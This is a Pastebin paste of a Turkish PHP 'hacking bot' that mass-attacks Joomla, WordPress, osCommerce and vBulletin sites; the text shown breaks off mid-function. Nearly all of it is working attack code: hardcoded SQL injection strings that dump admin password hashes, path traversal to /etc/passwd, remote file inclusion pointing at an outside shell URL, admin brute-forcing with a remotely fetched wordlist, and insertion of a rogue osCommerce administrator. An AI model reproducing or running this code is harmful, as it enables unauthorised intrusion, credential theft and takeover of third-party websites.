Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Hedef Site Hacking Tool[BOT] - Private Script
- Coded by HeLia
- ÖNEMLİ !!!!!!
- Eğer scripti localde kullanmak istiyorsanız
- AppServ 2.6.0 bilgisayırınızda yüklü olmalıdır. ve
- register_globals = On
- register_long_arrays = On
- magic_quotes_gpc = On
- Bu fonksiyonları php.ini'den off hale getirin.
- ÖNEMLİ !!!!!!
- IMPORTANT !!!!!!
- If you want use this script on localhost :
- AppServ 2.6.0 must be installed in your pc and
- register_globals = On
- register_long_arrays = On
- magic_quotes_gpc = On
- Make this functions into Off in php.ini
- IMPORTANT !!!!!!
- [REVERSE-IP] in Public Version
- [FIND SCRIPTS] in Public Version
- [JOOMLA TOKEN SCAN] in Public Version
- [JOOMLA ADMIN PANEL BRUTE] in Private Version
- [JOOMLA SQL INJECTION] in Private Version
- [JOOMLA RFI SCAN] in Private Version
- [JOOMLA LFI SCAN] in Private Version
- [JOOMLA SHELL SCAN] in Private Version
- [WORDPRESS BRUTE FORCE] in Private Version
- [WORDPRESS SQL INJECTION] in Private Version
- [WORDPRESS RFI SCAN] in Private Version
- [OSCOMMERCE ADMIN ADD] in Private Version
- [VBULLETIN BRUTE FORCE] in Private Version
- [VBULLETIN DATA SQL SCAN] in Private Version
- [PAGERANK CHECKER] in Private Version
- [SQL INJECTION SCAN] in Private Version
- [FTP CRACKER] in Private Version
- [KNIGHT ONLINE CRACKER] in Private Version
- [METIN2 CRACKER] in Private Version
- */
- ob_start();
- set_time_limit(0);
- class H_Tool{
- public $wordlist = "http://www.evdenevenakliyatlar.in/wordlist.txt";
- public $reverse = "http://networktools.nl/reverseip/";
- public $title = "#</b>:(.*?)</pre>#s";
- public $joom = array('components','option=com_');
- public $word = array('wp-content','wp-includes');
- public $osc = "Powered by osCommerce";
- public $vb = "Powered by vBulletin";
- public $token = "/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si";
- public $url_1 = "/index.php?option=com_user&view=reset&layout=confirm";
- public $url_2 = "/index.php?option=com_user&task=confirmreset";
- public $url_3 = "/administrator/index.php";
- public $url_4 = "/wp-login.php";
- public $url_5 = "/admin/administrators.php/login.php?action=insert";
- public $url_6 = "/admin/login.php?action=process";
- public $url_7 = "/admincp/index.php";
- public $url_8 = "/login.php?do=login";
- public $url_9 = "/faq.php?s=&do=search&q=database&match=all&titlesonly=0";
- public $wpreg = "general.php";
- public $jomreg = "com_config";
- public $osreg = "configuration.php";
- public $yol_1 = "/templates/beez/index.php";
- public $yol_2 = "/templates/rhuk_milkyway/index.php";
- public $yol_3 = "/templates/system/index.php";
- public $shellkey = "safe_mod";
- public $sqlregex = "/:([0-9a-f]{32}):/";
- public $lfiregex = "root:x:";
- public $pgregex = '#<td align="center">(.*?)</td></tr>#s';
- public $vbregex = "/name=\"s\" value=\"([0-9a-f]{32})\"/si";
- public $vbreg = "logout";
- public $datareg = "Port:";
- public $hata = array('Sql syntax','mysql_fetch_array()','mysql_fetch_row()','mysql_num_rows()','Unclosed');
- public $sql = '/https?\:\/\/[^\" ]+/i';
- public $shell = "http://www.pirates-crew.org/ox/miya/red.txt?";
- public $sql_1 = "/index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*";
- public $sql_2 = "/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(0x3a5f,username,0x3a,password,0x5f3a),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
- public $sql_3 = "/index.php?option=com_ttvideo&task=video&cid=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,CONCAT(username,0x3A,password),10,11,12,13,14,15,16,17%20FROM%20jos_users";
- public $sql_4 = "/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users–";
- public $sql_5 = "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
- public $sql_6 = "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
- public $sql_7 = "/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain";
- public $sql_8 = "/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*";
- public $sql_9 = "/?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201";
- public $sql_10 = "/wordpress/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--";
- public $sql_11 = "/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--";
- public $sql_12 = "/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*";
- public $sql_13 = "/wp-admin/admin.php?page=people&action=printable&event_id=-12+union+select+0,1,2,user_pass+from+wp_users";
- public $lfi_1 = "/jeauto/index.php?option=com_jeauto&view=../../../../../../../../../../../../../../../etc/passwd%00";
- public $lfi_2 = "/index.php?option=com_jeauto&view=../../../../../../../../../../etc/passwd%00";
- public $lfi_3 = "/index.php?option=com_jradio&controller=../../../../../../../../../../etc/passwd%00";
- public $lfi_4 = "/components/com_xgallery/helpers/img.php?file=../../../../../../../../../../etc/passwd%00&Itemid=4";
- public $lfi_5 = "/index.php?option=com_jotloader§ion=../../../../../../../../../../etc/passwd%00";
- public $lfi_6 = "/index.php?option=com_picasa2gallery&controller=../../../../../../../../etc/passwd%00";
- public $lfi_7 = "/index.php?option=com_communitypolls&controller=../../../../../..etc/passwd%00";
- public $lfi_8 = "/index.php?option=com_news_portal&controller=../../../../../../../../../../../../etc/passwd%00";
- public $lfi_9 = "/index.php?option=com_ccnewsletter&controller=../../../../../../../etc/passwd%00";
- public $lfi_10 = "/index.php?option=com_jesubmit&view=../../../../../../../../../../etc/passwd%00";
- public $lfi_11 = "/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../../../../../../../../etc/passwd%00";
- public $rfi_1 = "/components/com_simpleboard/file_upload.php?sbp=";
- public $rfi_2 = "/index.php?option=com_adsmanager&mosConfig_absolute_path=";
- public $rfi_3 = "/components/com_hashcash/server.php?mosConfig_absolute_path=";
- public $rfi_4 = "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
- public $rfi_5 = "/components/com_performs/performs.php?mosConfig_absolute_path=";
- public $rfi_6 = "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
- public $rfi_7 = "/components/com_smf/smf.php?mosConfig_absolute_path=";
- public $rfi_8 = "/components/com_galleria/galleria.html.php?mosConfig_absolute_path=";
- public $rfi_9 = "/akocomments.php?mosConfig_absolute_path=";
- public $rfi_10 = "/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=";
- public $rfi_11 = "/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=";
- public $rfi_12 = "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=";
- public $rfi_13 = "/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=";
- public $rfi_14 = "/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=";
- public $rfi_15 = "/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=";
- public $rfi_16 = "/modules/mod_weather.php?absolute_path=";
- public $rfi_17 = "/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=";
- public $rfi_18 = "/modules/mod_calendar.php?absolute_path=";
- public $rfi_19 = "/includes/Archive/Tar.php?mosConfig_absolute_path=";
- public $rfi_20 = "/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=";
- public $rfi_21 = "/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=";
- public $wprfi_1 = "/Enigma2.php?boarddir=";
- public $wprfi_2 = "/mygallery/myfunctions/mygallerybrowser.php?myPath=";
- public $wprfi_3 = "/plugins/wp-table/js/wptable-button.phpp?wpPATH=";
- public $wprfi_4 = "/plugins/wordtube/wordtube-button.php?wpPATH=";
- public $wprfi_5 = "/plugins/myflash/myflash-button.php?wpPATH=";
- public $wprfi_6 = "/plugins/BackUp/Archive.php?bkpwp_plugin_path=";
- public $wprfi_7 = "/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=";
- public $wprfi_8 = "/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=";
- public $wprfi_9 = "/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=";
- public $wprfi_10 = "/plugins/sniplets/modules/syntax_highlight.php?libpath=";
- public function ana(){
- echo "\n#######################################\nHedef Hacking Tool Private Script #\n";
- echo "Coded by MiyaChung #\n";
- echo "Usage : php tool.php komutlar #\n";
- echo "MiyaChung@hotmail.com #\n";
- echo "www.mavi1.org #\nSpecial Thanks : xzadx #\n#######################################\n";
- }
- public function komutlar(){
- echo "\nKomutlar\n\n 1.php tool.php www.site.com = (Reverse IP)\n";
- echo " 2.php bot.php ayir = (Ayirma Joomla-wordpress vs.)\n";
- echo " 3.php bot.php jomtoken = (Joomla token tara)\n";
- echo " 4.php bot.php jombrute = (Joomla brute)\n";
- echo " 5.php bot.php jomsql = (Joomla SQL Injection ara)\n";
- echo " 6.php bot.php jomlfi = (Joomla LFI ara)\n";
- echo " 7.php bot.php jomrfi = (Joomla RFI ara)\n";
- echo " 8.php bot.php shellara = (Joomla shell ara)\n";
- echo " 9.php bot.php wpbrute = (Wordpress brute)\n";
- echo " 10.php bot.php wpsql = (Wordpress SQL Injection ara)\n";
- echo " 11.php bot.php wprfi = (Wordpress RFI Ara)\n";
- echo " 12.php bot.php osreset = (osCommerce admin reset)\n";
- echo " 13.php bot.php vbrute = (vBulletin Brute Force)\n";
- echo " 14.php bot.php datasql = (vBulletin Data SQL ara)\n";
- echo " 15.php bot.php pagerank = (Pagerank Checker)\n";
- echo " 16.php bot.php sqlinj = (SQL Injection ara)\n";
- echo " 17.php bot.php ftpbrute = (FTP Cracker)\n";
- echo " 18.php bot.php kobrute = (Knight Online Cracker)\n";
- echo " 19.php bot.php metinbrute = (Metin2 Cracker)\n";
- }
- public function kaydet($dosya,$icerik){
- $fopen = fopen($dosya,'ab');
- fwrite($fopen,$icerik."\r\n");
- fclose($fopen);
- }
- public function reverse($site){
- $soket=curl_init();
- curl_setopt($soket,CURLOPT_URL,$this->reverse.$site);
- curl_setopt($soket,CURLOPT_RETURNTRANSFER,1);
- curl_exec($soket);
- $exec=curl_exec($soket);
- curl_close($soket);
- preg_match_all($this->title,$exec,$yaz);
- foreach($yaz[0] as $yazdir){
- $yazdir=ereg_replace("</b>:","",$yazdir);
- $yazdir=ereg_replace("</pre>","",$yazdir);
- $yazdir=explode("\n",$yazdir);
- foreach($yazdir as $liste){
- $liste=trim($liste);
- $kaydet = self::kaydet("reverse.txt",$liste);
- }
- $say = explode("\n",file_get_contents("reverse.txt"));
- $say = count($say);
- echo "Toplam ".$say." Site var . Siteler reverse.txt olarak kaydedildi.";
- }
- }
- public function ayir(){
- $siteler = explode("\n",file_get_contents('reverse.txt'));
- foreach($siteler as $tumsite){
- $tumsite=trim($tumsite);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_URL,$tumsite);
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_TIMEOUT,15);
- $calistir = curl_exec($curl);
- if(eregi($this->joom[0],$calistir)){
- echo $tumsite." -> Joomla bulundu joomla.txt\n";
- ob_flush();
- flush();
- $kayit_1 = self::kaydet("joomla.txt",$tumsite);
- }elseif(eregi($this->joom[1],$calistir)){
- echo $tumsite." -> Joomla bulundu joomla.txt\n";
- ob_flush();
- flush();
- $kayit_2 = self::kaydet("joomla.txt",$tumsite);
- }elseif(eregi($this->word[0],$calistir)){
- echo $tumsite." -> Wordpress bulundu wordpress.txt\n";
- ob_flush();
- flush();
- $kayit_3 = self::kaydet("wordpress.txt",$tumsite);
- }elseif(eregi($this->word[1],$calistir)){
- echo $tumsite." -> Wordpress bulundu wordpress.txt\n";
- ob_flush();
- flush();
- $kayit_3 = self::kaydet("wordpress.txt",$tumsite);
- }elseif(eregi($this->osc,$calistir)){
- echo $tumsite." -> osCommerce bulundu oscommerce.txt\n";
- ob_flush();
- flush();
- $kayit_3 = self::kaydet("oscommerce.txt",$tumsite);
- }elseif(eregi($this->vb,$calistir)){
- echo $tumsite." -> vBulletin bulundu vbulletin.txt\n";
- ob_flush();
- flush();
- $kayit_4 = self::kaydet("vbulletin.txt",$tumsite);
- }
- }
- echo "\nArama bitti.\n";
- }
- public function token_1($site){
- $curl=curl_init();
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_URL,$site);
- curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
- curl_setopt($curl, CURLOPT_TIMEOUT,35);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- }
- public function token_2(){
- $explode = explode("\n",file_get_contents("joomla.txt"));
- foreach($explode as $sitelist){
- $sitelist=trim($sitelist);
- $url_1 = $sitelist.$this->url_1;
- $hash = self::hashAl($url_1);
- $url_2 = $sitelist.$this->url_2;
- $curl=curl_init();
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_URL,$url_2);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
- curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- curl_setopt($curl, CURLOPT_POST, 1);
- curl_setopt($curl, CURLOPT_POSTFIELDS, "token=%27&".$hash."=1");
- curl_setopt($curl, CURLOPT_TIMEOUT,35);
- $exec = curl_exec($curl);
- curl_close($curl);
- if(eregi('name="password1"',$exec)){
- echo $sitelist." -> Joomla Token Bulundu token.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("token.txt",$sitelist.$this->url_1);
- }
- }
- @unlink("cookie.txt");
- echo "\nTarama Bitti sonuclar token.txt\n";
- }
- public function hashAl($site){
- $url=self::token_1($site);
- preg_match_all($this->token,$url,$hash);
- return $hash[1][0];
- }
- public function jombrute_1($url){
- $curl=curl_init();
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_URL,$url);
- curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- curl_setopt($curl, CURLOPT_COOKIEJAR, 'cook.txt');
- curl_setopt($curl, CURLOPT_COOKIEFILE, 'cook.txt');
- curl_setopt($curl, CURLOPT_TIMEOUT,35);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- }
- public function jombrute_2(){
- $exp = explode("\n",file_get_contents("http://www.evdenevenakliyatlar.in/wordlist.txt"));
- foreach($exp as $passwords){
- $passwords=trim($passwords);
- $explode = explode("\n",file_get_contents("joomla.txt"));
- foreach($explode as $sitelist){
- $sitelist=trim($sitelist);
- $url_1 = $sitelist.$this->url_3;
- $hash = self::hash_Al($url_1);
- $url_2 = $sitelist.$this->url_3;
- $curl=curl_init();
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_URL,$url_2);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($curl, CURLOPT_COOKIEJAR, 'cook.txt');
- curl_setopt($curl, CURLOPT_COOKIEFILE, 'cook.txt');
- curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
- curl_setopt($curl, CURLOPT_POST, 1);
- curl_setopt($curl, CURLOPT_POSTFIELDS, 'username=admin&passwd='.$passwords.'&lang=&option=com_login&task=login&'.$hash.'=1');
- curl_setopt($curl, CURLOPT_TIMEOUT,35);
- $exec = curl_exec($curl);
- curl_close($curl);
- if(eregi($this->jomreg,$exec)){
- echo $sitelist." -> admin:".$passwords." Panel girisi bulundu jombrute.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("jombrute.txt",$sitelist.$this->url_3." Password : ".$passwords."");
- }
- }
- }
- @unlink("cook.txt");
- echo "\nJoomla brute force bitti jombrute.txt";
- }
- public function hash_Al($site){
- $url=self::jombrute_1($site);
- preg_match_all($this->token,$url,$hash);
- return $hash[1][0];
- }
- public function wpbrute(){
- $exp = explode("\n",file_get_contents("http://www.evdenevenakliyatlar.in/wordlist.txt"));
- foreach($exp as $passwords){
- $passwords=trim($passwords);
- $explode = explode("\n",file_get_contents("wordpress.txt"));
- foreach($explode as $sites){
- $sifreler=trim($sifreler);
- $sites=trim($sites);
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$sites.$this->url_4);
- curl_setopt($curl,CURLOPT_COOKIEJAR,"cookie.dat");
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,"log=admin&pwd=".$passwords."&redirect_to=".$sites."/wp-admin/&testcookie=1");
- curl_setopt($curl,CURLOPT_TIMEOUT,25);
- $calis = curl_exec($curl);
- if(eregi($this->wpreg,$calis)){
- echo $sites." -> admin:".$passwords." Wordpress girisi bulundu wpbrute.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet('wpbrute.txt',$sites.$this->url_4." Password : ".$passwords."");
- }
- }
- }
- @unlink("cookie.dat");
- echo "\nWordpress Brute Force bitti";
- }
- public function osc_reset($sites){
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$sites.$this->url_5);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,'username=miyachung&password=12345&x=0&y=0');
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- $run=curl_exec($curl);
- curl_close($curl);
- return $run;
- }
- public function osc_login(){
- $explode = explode("\n",file_get_contents("oscommerce.txt"));
- foreach($explode as $siteler){
- $siteler=trim($siteler);
- $reset=self::osc_reset($siteler);
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$siteler.$this->url_6);
- curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)');
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl,CURLOPT_COOKIEFILE,'os.txt');
- curl_setopt($curl,CURLOPT_COOKIEJAR,'os.txt');
- curl_setopt($curl,CURLOPT_POST,1);
- curl_setopt($curl,CURLOPT_POSTFIELDS,'username=miyachung&password=12345');
- curl_setopt($curl,CURLOPT_TIMEOUT,10);
- $run=curl_exec($curl);
- curl_close($curl);
- if(eregi($this->osreg,$run)){
- echo $siteler." -> osCommerce admin eklendi osreset.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("osreset.txt",$siteler."/admin/login.php");
- }
- }
- @unlink("os.txt");
- echo "\nOscommerce admin reset deneme bitti\n";
- }
- public function shellara(){
- $explode = explode("\n",file_get_contents("reverse.txt"));
- foreach($explode as $sites){
- $sites=trim($sites);
- $url_1 = self::curl($sites.$this->yol_1);
- $url_2 = self::curl($sites.$this->yol_2);
- $url_3 = self::curl($sites.$this->yol_3);
- if(eregi($this->shellkey,$url_1)){
- echo $sites.$this->yol_1." -> Shell Bulundu shell.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("shell.txt",$sites.$this->yol_1);
- }
- if(eregi($this->shellkey,$url_2)){
- echo $sites.$this->yol_2." -> Shell Bulundu shell.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("shell.txt",$sites.$this->yol_2);
- }
- if(eregi($this->shellkey,$url_3)){
- echo $sites.$this->yol_3." -> Shell Bulundu shell.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("shell.txt",$sites.$this->yol_3);
- }
- }
- echo "\nShell Arama bitti.";
- }
- public function curl($site){
- $curl=curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl,CURLOPT_URL,$site);
- $exec=curl_exec($curl);
- curl_close($curl);
- return $exec;
- }
- public function jomsql(){
- $explode = explode("\n",file_get_contents("joomla.txt"));
- foreach($explode as $sites){
- $sites=trim($sites);
- $bak_1 = self::curl($sites.$this->sql_1);
- $bak_2 = self::curl($sites.$this->sql_2);
- $bak_3 = self::curl($sites.$this->sql_3);
- $bak_4 = self::curl($sites.$this->sql_4);
- $bak_5 = self::curl($sites.$this->sql_5);
- $bak_6 = self::curl($sites.$this->sql_6);
- if(preg_match($this->sqlregex,$bak_1)){
- echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_1);
- }
- if(preg_match($this->sqlregex,$bak_2)){
- echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_2);
- }
- if(preg_match($this->sqlregex,$bak_3)){
- echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_3);
- }
- if(preg_match($this->sqlregex,$bak_4)){
- echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_4);
- }
- if(preg_match($this->sqlregex,$bak_5)){
- echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_5);
- }
- if(preg_match($this->sqlregex,$bak_6)){
- echo $sites." -> Joomla SQL Bulundu jomsql.txt\n";
- ob_flush();
- flush();
- $kaydet=self::kaydet("jomsql.txt",$sites.$this->sql_6);
- }
- }
- echo "\nJoomla SQL Aramasi bitti.";
- }
- public function wpsql(){
- $explode = explode("\n",file_get_contents("wordpress.txt"));
- foreach($explode as $sites){
- $sites=trim($sites);
- $bak_1 = self::curl($sites.$this->sql_7);
- $bak_2 = self::curl($sites.$this->sql_8);
- $bak_3 = self::curl($sites.$this->sql_9);
- $bak_4 = self::curl($sites.$this->sql_10);
- $bak_5 = self::curl($sites.$this->sql_11);
- $bak_6 = self::curl($sites.$this->sql_12);
- $bak_7 = self::curl($sites.$this->sql_13);
- if(preg_match($this->sqlregex,$bak_1)){
- echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_7);
- }
- if(preg_match($this->sqlregex,$bak_2)){
- echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_8);
- }
- if(preg_match($this->sqlregex,$bak_3)){
- echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_9);
- }
- if(preg_match($this->sqlregex,$bak_4)){
- echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_10);
- }
- if(preg_match($this->sqlregex,$bak_5)){
- echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_11);
- }
- if(preg_match($this->sqlregex,$bak_6)){
- echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_12);
- }
- if(preg_match($this->sqlregex,$bak_7)){
- echo $sites." -> Wordpress SQL Bulundu wpsql.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("wpsql.txt",$sites.$this->sql_13);
- }
- }
- echo "\nWordpress SQL Aramasi bitti";
- }
- public function jomlfi(){
- $explode = explode("\n",file_get_contents("joomla.txt"));
- foreach($explode as $sites){
- $sites=trim($sites);
- $bak_1 = self::curl($sites.$this->lfi_1);
- $bak_2 = self::curl($sites.$this->lfi_2);
- $bak_3 = self::curl($sites.$this->lfi_3);
- $bak_4 = self::curl($sites.$this->lfi_4);
- $bak_5 = self::curl($sites.$this->lfi_5);
- $bak_6 = self::curl($sites.$this->lfi_6);
- $bak_7 = self::curl($sites.$this->lfi_7);
- $bak_8 = self::curl($sites.$this->lfi_8);
- $bak_9 = self::curl($sites.$this->lfi_9);
- $bak_10 = self::curl($sites.$this->lfi_10);
- $bak_11 = self::curl($sites.$this->lfi_11);
- if(eregi($this->lfiregex,$bak_1)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_1);
- }
- if(eregi($this->lfiregex,$bak_2)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_2);
- }
- if(eregi($this->lfiregex,$bak_3)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_3);
- }
- if(eregi($this->lfiregex,$bak_4)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_4);
- }
- if(eregi($this->lfiregex,$bak_5)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_5);
- }
- if(eregi($this->lfiregex,$bak_6)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_6);
- }
- if(eregi($this->lfiregex,$bak_7)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_7);
- }
- if(eregi($this->lfiregex,$bak_8)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_8);
- }
- if(eregi($this->lfiregex,$bak_9)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_9);
- }
- if(eregi($this->lfiregex,$bak_10)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_10);
- }
- if(eregi($this->lfiregex,$bak_11)){
- echo $sites." -> Joomla LFI bulundu jomlfi.txt\n";
- ob_flush();
- flush();
- $kaydet = self::kaydet("jomlfi.txt",$sites.$this->lfi_11);
- }
- }
- echo "\nJoomla LFI Aramasi bitti";
- }
- public function jomrfi(){
- $explode = explode("\n",file_get_contents("joomla.txt"));
- foreach($explode as $sites){
- $sites=trim($sites);
- $bak_1 = self::curl($sites.$this->rfi_1.$this->shell);
- $bak_2 = self::curl($sites.$this->rfi_2.$this->shell);
- $bak_3 = self::curl($sites.$this->rfi_3.$this->shell);
- $bak_4 = self::curl($sites.$this->rfi_4.$this->shell);
- $bak_5 = self::curl($sites.$this->rfi_5.$this->shell);
- $bak_6 = self::curl($sites.$this->rfi_6.$this->shell);
- $bak_7 = self::curl($sites.$this->rfi_7.$this->shell);
- $bak_8 = self::curl($sites.$this->rfi_8.$this->shell);
- $bak_9 = self::curl($sites.$this->rfi_9.$this->shell);
